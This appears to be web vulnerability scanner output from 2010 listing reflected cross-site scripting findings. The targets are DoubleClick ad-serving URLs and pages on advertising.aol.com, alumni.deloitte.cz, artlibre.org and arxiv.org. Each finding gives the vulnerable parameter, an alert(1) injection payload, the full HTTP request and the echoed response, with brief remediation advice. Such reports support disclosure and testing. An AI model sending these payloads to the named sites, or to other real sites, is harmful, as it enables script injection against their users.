<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... /%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616d7295"-alert(1)-"6e36561f977&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http: ...[SNIP]...
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f61d8"-alert(1)-"ec4061367c2 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:21 GMT Expires: Mon, 22 Nov 2010 00:09:21 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7037
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... bleclick.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253Af61d8"-alert(1)-"ec4061367c2&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAA ...[SNIP]...
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5ca9"-alert(1)-"ec39cdc4ef5 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:53 GMT Expires: Mon, 22 Nov 2010 00:14:53 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... /1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=a5ca9"-alert(1)-"ec39cdc4ef5&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_busines ...[SNIP]...
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f2e"-alert(1)-"4dc1a9e7e19 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:38 GMT Expires: Mon, 22 Nov 2010 00:14:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7152
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... 87/38538544/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=22f2e"-alert(1)-"4dc1a9e7e19&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsi ...[SNIP]...
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34ac4"-alert(1)-"b0330c890e3 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:51 GMT Expires: Mon, 22 Nov 2010 00:09:51 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7152
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... .net/click%3Bh%3Dv8/3a5a/17/14a/%2a/x%3B231155693%3B6-0%3B0%3B54795159%3B4307-300/250%3B38520787/38538544/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=34ac4"-alert(1)-"b0330c890e3&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=201 ...[SNIP]...
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e630"-alert(1)-"8fa588eb30a was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:28 GMT Expires: Mon, 22 Nov 2010 00:15:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7152
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... //adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=7e630"-alert(1)-"8fa588eb30a&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationpro ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6b15"-alert(1)-"c72a06acb68 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:17 GMT Expires: Mon, 22 Nov 2010 00:16:17 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7063
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... =cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAEc6b15"-alert(1)-"c72a06acb68&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=609AA01A&cn=itmrgquestdubai"); var fscUrl = ur ...[SNIP]...
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e003"-alert(1)-"21012b00b88 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:06:33 GMT Expires: Mon, 22 Nov 2010 00:11:33 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6715
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri ...[SNIP]... z%3B231155693%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=4e003"-alert(1)-"21012b00b88&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31a76"-alert(1)-"eed06fa5ff8 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:08:26 GMT Expires: Mon, 22 Nov 2010 00:13:26 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... 0%3B0%3B54795159%3B4307-300/250%3B38520812/38538569/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=10031a76"-alert(1)-"eed06fa5ff8&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovatio ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef3da"-alert(1)-"0e0b492657e was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:18 GMT Expires: Mon, 22 Nov 2010 00:15:18 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7063
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=ef3da"-alert(1)-"0e0b492657e&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itque ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8708"-alert(1)-"6c6fa352822 was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:52 GMT Expires: Mon, 22 Nov 2010 00:10:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7119
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... 5a/17/14a/%2a/i%3B231155693%3B1-0%3B0%3B54795159%3B4307-300/250%3B37759247/37777099/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100e8708"-alert(1)-"6c6fa352822&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfc7e"-alert(1)-"9a508cfa52b was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:06 GMT Expires: Mon, 22 Nov 2010 00:16:06 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... 7335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18cfc7e"-alert(1)-"9a508cfa52b&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationprotection&cmp=usmmb&cm=b&csr=infoprots ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c586e"-alert(1)-"b8e9766edfd was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:28 GMT Expires: Mon, 22 Nov 2010 00:14:28 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7037
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... 8011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66Bc586e"-alert(1)-"b8e9766edfd&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/process-transforma ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11626"-alert(1)-"1111d615a75 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:03:57 GMT Expires: Mon, 22 Nov 2010 00:08:57 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7028
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/14a/%2a/d%3B231155693%3B3-0%3B0%3B54795159%3B4307-300/250%3B38011073/38028830/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=46733511626"-alert(1)-"1111d615a75&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg= ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d853"-alert(1)-"06c62bbdd38 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:34 GMT Expires: Mon, 22 Nov 2010 00:10:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7037
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... %3Dv8/3a5a/17/14a/%2a/s%3B231155693%3B4-0%3B0%3B54795159%3B4307-300/250%3B38011117/38028874/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=29d853"-alert(1)-"06c62bbdd38&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36. ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c49e5"-alert(1)-"8a7d815ab33 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:03:32 GMT Expires: Mon, 22 Nov 2010 00:08:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]...
var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/14a/%2a/u%3B231155693%3B7-0%3B0%3B54795159%3B4307-300/250%3B38520812/38538569/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041c49e5"-alert(1)-"8a7d815ab33&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121. ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1d05"-alert(1)-"b12f47b9ddd was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:31 GMT Expires: Mon, 22 Nov 2010 00:16:31 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7063
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... t=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46d1d05"-alert(1)-"b12f47b9ddd&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=609AA01A&cn=itmrgquestdubai"); var fscUrl = url; var fscUrlClickTagF ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94be2'><script>alert(1)</script>9f219222b62 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/tuaw94be2'><script>alert(1)</script>9f219222b62 HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.81. http://advertising.aol.com/brands/tuaw [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://advertising.aol.com
Path:
/brands/tuaw
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1d2a'><script>alert(1)</script>baf21def41f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /brands/tuaw?f1d2a'><script>alert(1)</script>baf21def41f=1 HTTP/1.1 Host: advertising.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.82. http://alumni.deloitte.cz/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://alumni.deloitte.cz
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e49cf"><script>alert(1)</script>5c886eb515 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e49cf"><script>alert(1)</script>5c886eb515=1 HTTP/1.1 Host: alumni.deloitte.cz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 22 Nov 2010 01:18:52 GMT Server: Apache X-Powered-By: PHP/5.2.3 Set-Cookie: PHPSESSID=75ac4f96d3bf692d5fb8c42a7e63c71e; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 8130
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs"> ...[SNIP]... <form name="frmLogin" id="frmLogin" action="/?e49cf"><script>alert(1)</script>5c886eb515=1" method="post"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload df786<script>alert(1)</script>1f52ce30d3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /licencedf786<script>alert(1)</script>1f52ce30d3f/lalgb.html HTTP/1.1 Host: artlibre.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 22 Nov 2010 01:33:12 GMT Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5 X-Powered-By: PHP/4.4.4 with Hardening-Patch X-Pingback: http://artlibre.org/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 22 Nov 2010 01:33:13 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 6014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9faec<script>alert(1)</script>e8dae2f14a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /licence/9faec<script>alert(1)</script>e8dae2f14a5 HTTP/1.1 Host: artlibre.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 22 Nov 2010 01:33:16 GMT Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5 X-Powered-By: PHP/4.4.4 with Hardening-Patch X-Pingback: http://artlibre.org/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 22 Nov 2010 01:33:17 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 6004
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1786e</title><script>alert(1)</script>164767422c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/1003.04491786e</title><script>alert(1)</script>164767422c2 HTTP/1.1 Host: arxiv.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Mon, 22 Nov 2010 01:32:45 GMT Server: Apache Set-Cookie: browser=174.121.222.18.1290389565968129; path=/; max-age=946080000; domain=.arxiv.org Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 1824
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[1003.04491786e</title><script>alert(1)</script>164767422c2] Bad paper identifier</title> ...[SNIP]...
